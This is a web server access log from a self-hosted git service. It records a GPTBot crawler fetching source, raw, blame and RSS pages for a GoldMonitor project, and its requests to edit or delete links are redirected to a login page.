[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 12757] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 12605] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 12560] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 20986] [Gzip 6.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:14:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:14:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:14:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:14:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:14:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:15:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:15:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:15:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:15:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:15:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:15:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:15:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:15:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:15:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:15:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:15:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:15:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:15:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 18656] [Gzip 9.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 10414] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 23158] [Gzip 11.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:17:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 22433] [Gzip 11.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 6379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:15:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:15:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:17:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 9500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:17:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 12600] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:15:18 